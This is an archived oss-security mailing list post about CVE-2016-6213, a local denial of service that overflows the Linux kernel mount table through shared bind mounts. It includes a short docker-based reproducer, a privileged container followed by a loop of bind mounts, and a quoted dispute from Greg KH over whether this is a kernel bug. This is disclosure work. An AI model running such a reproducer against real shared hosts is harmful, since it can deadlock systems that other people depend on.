Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 14 Jul 2016 12:15:02 -0400 (EDT)
From: CAI Qian <caiqian@...hat.com>
To: Greg KH <greg@...ah.com>
Cc: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: Re: Re: cve request: local DoS by overflowing kernel
 mount table using shared bind mount

Maybe this is a better reproducer using docker. It is exploitable even with
user namespace enabled.

# docker run -it -v /mnt/:/mnt/:shared --cap-add=SYS_ADMIN rhel7 /bin/bash

# cat /proc/self/uid_map 
         0        995      65536

# cat /proc/self/gid_map 
         0        992      65536

(insider container) # for i in `seq 1 20`; mount -o bind /mnt/1 /mnt/2; done
   CAI Qian

----- Original Message -----
> From: "Greg KH" <greg@...ah.com>
> To: oss-security@...ts.openwall.com
> Cc: caiqian@...hat.com, cve-assign@...re.org
> Sent: Wednesday, July 13, 2016 6:45:00 PM
> Subject: Re: [oss-security] Re: cve request: local DoS by overflowing kernel mount table using shared bind mount
> 
> On Wed, Jul 13, 2016 at 12:59:40PM -0400, cve-assign@...re.org wrote:
> > > It was reported that the mount table expands by a power-of-two
> > > with each bind mount command.
> > 
> > > If the system is configured in the way that a non-root user
> > > allows bind mount even if with limit number of bind mount
> > > allowed, a non-root user could cause a local DoS by quickly
> > > overflow the mount table.
> > 
> > > it will cause a deadlock for the whole system,
> > 
> > >> form of unlimited memory consumption that is causing the problem
> > 
> > Use CVE-2016-6213.
> 
> A CVE for an "improperly configured system"?  Huh?  What distro has such
> a configuration set by default?  This isn't a kernel bug, so what is
> this CVE classified as being "against"?  It better not be against the
> Linux kernel...
> 
> confused,
> 
> greg k-h
> 

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ